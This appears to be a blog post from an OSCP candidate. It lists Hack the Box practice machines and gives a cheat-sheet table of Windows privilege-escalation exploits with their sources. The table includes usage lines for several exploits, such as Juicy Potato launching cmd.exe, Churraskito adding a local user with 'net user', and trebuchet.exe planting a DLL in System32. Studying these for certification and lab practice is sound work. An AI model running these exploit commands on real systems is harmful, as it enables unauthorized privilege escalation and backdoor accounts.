Introduction

As many of you are aware, I am currently ‘trying harder‘ studying for my OSCP in preparation for my exam next month. I have done the labs provided by Offensive Security and now I am going to be focusing on the Hack the Box (HTB) style OSCP boxes (and possibly a pro lab) leading up to my exam. Below is a chart taken from @TJ_Null on Twitter highlighting all the boxes I will be attempting. As I complete each box on the list I will tag it here for an easy reference.

I can say from the reading I have done across the web that I approach these boxes differently than most. I prefer the easiest laziest approach possible and prefer a GUI to a console window. With all that being said ALL these boxes will be done without the help of SQLMap or Metasploit or any other tool not allowed (or one time use) from the exam.

I hope you enjoy!

Linux Boxes:Windows Boxes:More Challenging:
LameLegacyJeeves [Windows]
BrainfuckBlue*Bart [Windows]
ShockerDevelTally [Windows]
Bashed*OptimumKotarak [Linux]
Nibbles*Bastard*Falafel [Linux]
BeepGranny*Devops [Linux]
CronosArctic*Hawk [Linux]
NinevehGrandpaNetmon [Windows]*
SenseSiloLightweight [Linux]
SolidstateBountyLa Casa De Papel [Linux]
NodeJerryJail [Linux]
Valentine*ConcealSafe [Linux]
PoisonChatterbox*Bitlab [Linux]
SundayForestSizzle [Windows]
TartarsauceBankRobberSniper [Windows]
IrkedSecnotesControl [Windows]
FriendzoneBastionOctober [Linux]
SwagshopBUFFMango [Linux]*
NetworkedServmonNest [Windows]
JarvisActiveBook [Linux]
MiraiSauna [Windows]
PopcornCascade [Windows]
HaircutQuerier [Windows]
Blocky
Frolic
Postman
Mango*
Traverxec
OpenAdmin

*Some of the boxes I have completed and haven’t done a guide for (yet!). Also, some of the boxes Nibbles and Arctic gave so much lag/issues they were annoying to complete and I didn’t do proper screenshots.

Windows

During my preparation for the OSCP exam I have been coming across a lot of one-off exploits for escalation after the initial foothold. For Windows exploits I found an amazing article HERE by kakyouim which outlines a ton of Windows exploits. I took this article and made a excel file (for my notes) which I have included below. I plan to expand upon it in the future but figured it would be a quick reference for anyone looking. PLEASE visit the original author who took the time to put all this together.

Exploit NameURLContextHTB
Potato (high) RottenPotatoNG
Juicy Potato		usage rottenpotato.exe
"Juicy Potato x86.exe" -l 4444 -p c:\windows\system32\cmd.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}
MS09-012 (high)ExploitDB - 6705
SecWiki - MS09-012
GitHub - Re4son/Chimichurri		/xxoo/-->Usage: pr.exe command
usage churrasco.exe whoami
Chimichurri.exe		Bastard
MS10-015 (high)ExploitDB - 11199
SecWiki - MS10-015
GitHub - am0nsec MS10-015-KiTrap0D
MS10-047 (low)ExploitDB - 14670
ExploitDB - 14666
MS10-059 (high)SecWiki - MS10-059MS10-059.exe 10.10.14.20 4447
Churraskito.exe "C:\windows\system32\cmd.exe" "net user 123 123 /add"
MS10-073 (medium)ExploitDB - 15985Ignore. Requires compile. Go through MetaSploit worst case.
MS10-092 (high)ExploitDB - 19930MetaSploit. exploit/windows/local/ms10_092_schelevator
MS11-011 (medium)ExploitDB - 16262
SecWiki - MS11-011		MS11-011.exe
MS11-046 (high)ExploitDB - 40564
SecWiki - MS11-046
GitHub am0nsec MS11-046		ExploitDB requires Compile - i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
MS11-062 (high)ExploitDB - 40627
SecWiki - MS11-062		ExploitDB requires Compile - i686-w64-mingw32-gcc MS11-062.c -o MS11-062.exe -lws2_32
MS11-080 (high)ExploitDB - 18176
ExploitDB - 21844
SecWiki - MS11-080
GitHub - am0nsec MS11-080		CVE-2011-2005.py MS11_80_k8.exe ms11-080-AddUser.exe ms11-080.exe
MS13-005 (medium)N/A
MS13-053 (medium)ExploitDB - 33213
GitHub - SecWiki MS13-053		MS13-053.exe
MS13-081 (medium)exploit/windows/local/ms13_081_track_popup_menMetaSploit
MS14-002 (high)ExploitDB - 37732
GitHub - SecWiki MS14-002
GitHub - am0nsec MS14-002		MS14-002.exe XP
MS14-002.exe 2k3
MS14-026 (low)N/A
MS14-040 (high)ExploitDB - 39446
GitHub - SecWiki MS14-040		MS14-40-x86.exe
MS14-040-x64.exe
MS14_058 (high)ExploitDB - 39666
ExploitDB - 35101
GitHub - SecWiki MS14-058		MS14-058.exe
MS14-068 (medium)ExploitDB - 35474
GitHub - SecWiki MS14-068		ms14-068.py -u @ -s -d
MS14-070 (high)ExploitDB - 37755
ExploitDB - 35936
GitHub - SecWiki MS14-070		35936.exe 37755.exe
MS15-004 (medium)N/A
MS15-010 (meduim)ExploitDB - 37098
ExploitDB - 39035
GitHub - SecWiki MS15-010		39035.exe
MS15-051 (high)ExploitDB - 37367
ExploitDB - 37049
GitHub - SecWiki MS15-051		ms15-051x64.exe evil-nc.exeBastard
MS15-076 (medium)ExploitDB - 37768
GitHub - SecWiki MS15-076		2/3min interval - trebuchet.exe C:\Users\Bob\Evil.txt C:\Windows\System32\Evil.dll
MS15-078 (meduim)N/A
MS15-102 (low)N/AArctic
MS16-014 (high)ExploitDB - 40039
ExploitDB - 39442
GitHub - SecWiki MS16-014		 usage ms16-014.exe whoami ???????
MS16-016 (high)ExploitDB - 40085
ExploitDB - 39788
ExploitDB - 39432
GitHub - SecWiki MS16-016		EoP.exe
MS16-032 (high)ExploitDB - 39719
ExploitDB - 39574
ExploitDB - 39809
ExploitDB - 40107
GitHub - SecWiki MS16-032		x86/ms16-032.exe
x64/ms16-032.exe
MS16-032.ps1		Optimum
MS16-034 (very low)N/A
MS16-075 (medium)ExploitDB - 45562
GitHub - SecWiki MS16-075
GitHub - AlessandroZ BeRoot		Tater.ps1 (seems works) potato.exe
MS16-098 (high)ExploitDB - 41020
GitHub - SecWiki MS16-098
GitHub - sensepost ms16-098		bfill.exeOptimum
MS16-135 (high)ExploitDB - 41015
GitHub - SecWiki MS16-135
GitHub - FuzzySecurity MS16-135		41015.exe MS16-135.ps1 SetWindowLongPtr_Exploit.exe
MS17-010 (high)GitHub - 3ndG4me AutoBlue-MS17-010Varies based off OS. Must compile shellcode first.Blue

Published On: October 21st, 2020 / Categories: Technology, Cyber Security, HTB / Tags: , , , , /

Related Posts

HTB – Busqueda

April 3rd, 2024|0 Comments

HTB – MonitorsTwo

April 3rd, 2024|0 Comments

HTB – Pilgrimage

April 3rd, 2024|0 Comments

HTB – Keeper

August 13th, 2023|0 Comments

Leave A Comment